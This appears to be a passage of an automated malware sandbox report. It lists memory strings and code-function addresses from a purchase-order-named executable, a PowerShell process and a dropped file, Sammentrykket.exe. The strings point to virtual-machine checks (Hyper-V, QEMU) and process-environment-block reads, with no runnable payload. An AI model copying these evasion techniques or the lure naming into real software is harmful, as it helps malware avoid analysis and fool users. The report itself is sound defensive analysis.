        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: Sammentrykket.exe, 00000004.00000002.77592666966.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77040018762.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136726603.0000000004890000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.0000000004891000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135363971.00000000048C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000002.00000002.76787212994.0000000007190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeAPI call chain: ExitProcess graph end nodegraph_0-1468
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeAPI call chain: ExitProcess graph end nodegraph_0-1663
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_032BD51C LdrInitializeThunk,LdrInitializeThunk,2_2_032BD51C
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091C090 mov eax, dword ptr fs:[00000030h]4_2_2091C090
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091A093 mov ecx, dword ptr fs:[00000030h]4_2_2091A093
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F4080 mov eax, dword ptr fs:[00000030h]4_2_209F4080
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F4080 mov eax, dword ptr fs:[00000030h]4_2_209F4080
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F4080 mov eax, dword ptr fs:[00000030h]4_2_209F4080
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F4080 mov eax, dword ptr fs:[00000030h]4_2_209F4080
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F4080 mov eax, dword ptr fs:[00000030h]4_2_209F4080
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F4080 mov eax, dword ptr fs:[00000030h]4_2_209F4080
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F4080 mov eax, dword ptr fs:[00000030h]4_2_209F4080
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F50B7 mov eax, dword ptr fs:[00000030h]4_2_209F50B7
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209DB0AF mov eax, dword ptr fs:[00000030h]4_2_209DB0AF
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209600A5 mov eax, dword ptr fs:[00000030h]4_2_209600A5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209CF0A5 mov eax, dword ptr fs:[00000030h]4_2_209CF0A5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209CF0A5 mov eax, dword ptr fs:[00000030h]4_2_209CF0A5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209CF0A5 mov eax, dword ptr fs:[00000030h]4_2_209CF0A5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209CF0A5 mov eax, dword ptr fs:[00000030h]4_2_209CF0A5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209CF0A5 mov eax, dword ptr fs:[00000030h]4_2_209CF0A5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209CF0A5 mov eax, dword ptr fs:[00000030h]4_2_209CF0A5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209CF0A5 mov eax, dword ptr fs:[00000030h]4_2_209CF0A5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2093B0D0 mov eax, dword ptr fs:[00000030h]4_2_2093B0D0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091B0D6 mov eax, dword ptr fs:[00000030h]4_2_2091B0D6
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091B0D6 mov eax, dword ptr fs:[00000030h]4_2_2091B0D6
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091B0D6 mov eax, dword ptr fs:[00000030h]4_2_2091B0D6
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091B0D6 mov eax, dword ptr fs:[00000030h]4_2_2091B0D6
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2095D0F0 mov eax, dword ptr fs:[00000030h]4_2_2095D0F0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2095D0F0 mov ecx, dword ptr fs:[00000030h]4_2_2095D0F0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091C0F6 mov eax, dword ptr fs:[00000030h]4_2_2091C0F6
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209190F8 mov eax, dword ptr fs:[00000030h]4_2_209190F8
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209190F8 mov eax, dword ptr fs:[00000030h]4_2_209190F8
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209190F8 mov eax, dword ptr fs:[00000030h]4_2_209190F8
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209190F8 mov eax, dword ptr fs:[00000030h]4_2_209190F8
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20945004 mov eax, dword ptr fs:[00000030h]4_2_20945004
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20945004 mov ecx, dword ptr fs:[00000030h]4_2_20945004
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20928009 mov eax, dword ptr fs:[00000030h]4_2_20928009
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091D02D mov eax, dword ptr fs:[00000030h]4_2_2091D02D
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20921051 mov eax, dword ptr fs:[00000030h]4_2_20921051
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20921051 mov eax, dword ptr fs:[00000030h]4_2_20921051
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F505B mov eax, dword ptr fs:[00000030h]4_2_209F505B
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20950044 mov eax, dword ptr fs:[00000030h]4_2_20950044
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20927072 mov eax, dword ptr fs:[00000030h]4_2_20927072
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20926074 mov eax, dword ptr fs:[00000030h]4_2_20926074
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20926074 mov eax, dword ptr fs:[00000030h]4_2_20926074
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209C9060 mov eax, dword ptr fs:[00000030h]4_2_209C9060
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20949194 mov eax, dword ptr fs:[00000030h]4_2_20949194
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20961190 mov eax, dword ptr fs:[00000030h]4_2_20961190
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20961190 mov eax, dword ptr fs:[00000030h]4_2_20961190
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20924180 mov eax, dword ptr fs:[00000030h]4_2_20924180
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20924180 mov eax, dword ptr fs:[00000030h]4_2_20924180
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20924180 mov eax, dword ptr fs:[00000030h]4_2_20924180
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F51B6 mov eax, dword ptr fs:[00000030h]4_2_209F51B6
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209531BE mov eax, dword ptr fs:[00000030h]4_2_209531BE
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209531BE mov eax, dword ptr fs:[00000030h]4_2_209531BE
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209541BB mov ecx, dword ptr fs:[00000030h]4_2_209541BB
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209541BB mov eax, dword ptr fs:[00000030h]4_2_209541BB
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209541BB mov eax, dword ptr fs:[00000030h]4_2_209541BB
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2095E1A4 mov eax, dword ptr fs:[00000030h]4_2_2095E1A4
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2095E1A4 mov eax, dword ptr fs:[00000030h]4_2_2095E1A4
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209301C0 mov eax, dword ptr fs:[00000030h]4_2_209301C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209301C0 mov eax, dword ptr fs:[00000030h]4_2_209301C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209351C0 mov eax, dword ptr fs:[00000030h]4_2_209351C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209351C0 mov eax, dword ptr fs:[00000030h]4_2_209351C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209351C0 mov eax, dword ptr fs:[00000030h]4_2_209351C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209351C0 mov eax, dword ptr fs:[00000030h]4_2_209351C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209191F0 mov eax, dword ptr fs:[00000030h]4_2_209191F0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209191F0 mov eax, dword ptr fs:[00000030h]4_2_209191F0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209301F1 mov eax, dword ptr fs:[00000030h]4_2_209301F1
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209301F1 mov eax, dword ptr fs:[00000030h]4_2_209301F1
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209301F1 mov eax, dword ptr fs:[00000030h]4_2_209301F1
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094F1F0 mov eax, dword ptr fs:[00000030h]4_2_2094F1F0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094F1F0 mov eax, dword ptr fs:[00000030h]4_2_2094F1F0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209E81EE mov eax, dword ptr fs:[00000030h]4_2_209E81EE
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209E81EE mov eax, dword ptr fs:[00000030h]4_2_209E81EE
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A1E3 mov eax, dword ptr fs:[00000030h]4_2_2092A1E3
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A1E3 mov eax, dword ptr fs:[00000030h]4_2_2092A1E3
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A1E3 mov eax, dword ptr fs:[00000030h]4_2_2092A1E3
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A1E3 mov eax, dword ptr fs:[00000030h]4_2_2092A1E3
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A1E3 mov eax, dword ptr fs:[00000030h]4_2_2092A1E3
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094B1E0 mov eax, dword ptr fs:[00000030h]4_2_2094B1E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094B1E0 mov eax, dword ptr fs:[00000030h]4_2_2094B1E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094B1E0 mov eax, dword ptr fs:[00000030h]4_2_2094B1E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094B1E0 mov eax, dword ptr fs:[00000030h]4_2_2094B1E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094B1E0 mov eax, dword ptr fs:[00000030h]4_2_2094B1E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094B1E0 mov eax, dword ptr fs:[00000030h]4_2_2094B1E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094B1E0 mov eax, dword ptr fs:[00000030h]4_2_2094B1E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209291E5 mov eax, dword ptr fs:[00000030h]4_2_209291E5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209291E5 mov eax, dword ptr fs:[00000030h]4_2_209291E5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209181EB mov eax, dword ptr fs:[00000030h]4_2_209181EB
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]4_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20950118 mov eax, dword ptr fs:[00000030h]4_2_20950118
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]4_2_2094510F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092510D mov eax, dword ptr fs:[00000030h]4_2_2092510D
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209DF13E mov eax, dword ptr fs:[00000030h]4_2_209DF13E
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20957128 mov eax, dword ptr fs:[00000030h]4_2_20957128
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20957128 mov eax, dword ptr fs:[00000030h]4_2_20957128
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F3157 mov eax, dword ptr fs:[00000030h]4_2_209F3157
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F3157 mov eax, dword ptr fs:[00000030h]4_2_209F3157
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F3157 mov eax, dword ptr fs:[00000030h]4_2_209F3157
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2095415F mov eax, dword ptr fs:[00000030h]4_2_2095415F
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209B314A mov eax, dword ptr fs:[00000030h]4_2_209B314A
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209B314A mov eax, dword ptr fs:[00000030h]4_2_209B314A
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209B314A mov eax, dword ptr fs:[00000030h]4_2_209B314A
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209B314A mov eax, dword ptr fs:[00000030h]4_2_209B314A
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F5149 mov eax, dword ptr fs:[00000030h]4_2_209F5149
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091A147 mov eax, dword ptr fs:[00000030h]4_2_2091A147
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091A147 mov eax, dword ptr fs:[00000030h]4_2_2091A147
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091A147 mov eax, dword ptr fs:[00000030h]4_2_2091A147
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20926179 mov eax, dword ptr fs:[00000030h]4_2_20926179
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2097717A mov eax, dword ptr fs:[00000030h]4_2_2097717A
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2097717A mov eax, dword ptr fs:[00000030h]4_2_2097717A
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20927290 mov eax, dword ptr fs:[00000030h]4_2_20927290
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20927290 mov eax, dword ptr fs:[00000030h]4_2_20927290
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20927290 mov eax, dword ptr fs:[00000030h]4_2_20927290
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2099E289 mov eax, dword ptr fs:[00000030h]4_2_2099E289
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091C2B0 mov ecx, dword ptr fs:[00000030h]4_2_2091C2B0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209FB2BC mov eax, dword ptr fs:[00000030h]4_2_209FB2BC
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209FB2BC mov eax, dword ptr fs:[00000030h]4_2_209FB2BC
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209FB2BC mov eax, dword ptr fs:[00000030h]4_2_209FB2BC
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209FB2BC mov eax, dword ptr fs:[00000030h]4_2_209FB2BC
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209DF2AE mov eax, dword ptr fs:[00000030h]4_2_209DF2AE
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209E92AB mov eax, dword ptr fs:[00000030h]4_2_209E92AB
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209442AF mov eax, dword ptr fs:[00000030h]4_2_209442AF
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209442AF mov eax, dword ptr fs:[00000030h]4_2_209442AF
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209192AF mov eax, dword ptr fs:[00000030h]4_2_209192AF
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209432C5 mov eax, dword ptr fs:[00000030h]4_2_209432C5
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209532C0 mov eax, dword ptr fs:[00000030h]4_2_209532C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209532C0 mov eax, dword ptr fs:[00000030h]4_2_209532C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F32C9 mov eax, dword ptr fs:[00000030h]4_2_209F32C9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]4_2_209302F9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]4_2_209302F9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]4_2_209302F9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]4_2_209302F9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]4_2_209302F9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]4_2_209302F9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]4_2_209302F9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]4_2_209302F9
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209172E0 mov eax, dword ptr fs:[00000030h]4_2_209172E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A2E0 mov eax, dword ptr fs:[00000030h]4_2_2092A2E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A2E0 mov eax, dword ptr fs:[00000030h]4_2_2092A2E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A2E0 mov eax, dword ptr fs:[00000030h]4_2_2092A2E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A2E0 mov eax, dword ptr fs:[00000030h]4_2_2092A2E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A2E0 mov eax, dword ptr fs:[00000030h]4_2_2092A2E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2092A2E0 mov eax, dword ptr fs:[00000030h]4_2_2092A2E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209282E0 mov eax, dword ptr fs:[00000030h]4_2_209282E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209282E0 mov eax, dword ptr fs:[00000030h]4_2_209282E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209282E0 mov eax, dword ptr fs:[00000030h]4_2_209282E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209282E0 mov eax, dword ptr fs:[00000030h]4_2_209282E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091D2EC mov eax, dword ptr fs:[00000030h]4_2_2091D2EC
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091D2EC mov eax, dword ptr fs:[00000030h]4_2_2091D2EC
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091821B mov eax, dword ptr fs:[00000030h]4_2_2091821B
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209AB214 mov eax, dword ptr fs:[00000030h]4_2_209AB214
